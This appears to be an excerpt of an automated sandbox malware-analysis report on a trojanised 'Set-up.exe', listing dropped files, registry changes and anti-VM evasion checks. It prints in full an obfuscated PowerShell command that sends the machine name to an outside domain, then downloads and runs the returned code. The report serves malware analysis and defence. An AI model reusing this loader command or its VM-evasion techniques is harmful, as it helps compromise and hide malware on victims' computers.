              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Set-up.exeStatic file information: File size 75269806 > 1048576

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5xJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004716D4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004716D4
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: Set-up.exeStatic PE information: section name: .sxdata
              Source: 9ONHJ3I0NWFBK4Q0S62.exe.0.drStatic PE information: section name: .didata
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.5.drStatic PE information: section name: .didata
              Source: 9ONHJ3I0NWFBK4Q0S62.tmp.7.drStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046CA54 pushad ; retf 0046h0_2_0046CA55
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046D0C0 push eax; ret 0_2_0046D0EE
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004597D0 push ecx; mov dword ptr [esp], ecx0_2_004597D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046BB5C push eax; ret 0_2_0046BB7A
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C2F54 pushad ; retf 0_2_006C2F55
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006BF6DE push eax; mov dword ptr [esp], D2DDDC2Fh0_2_006BF6DF
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006C3E94 push ebx; retf 0_2_006C3E95
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeFile created: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-F9S0P.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeFile created: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmpJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BAB7C44
              Tries to detect virtualization through RDTSC time measurements
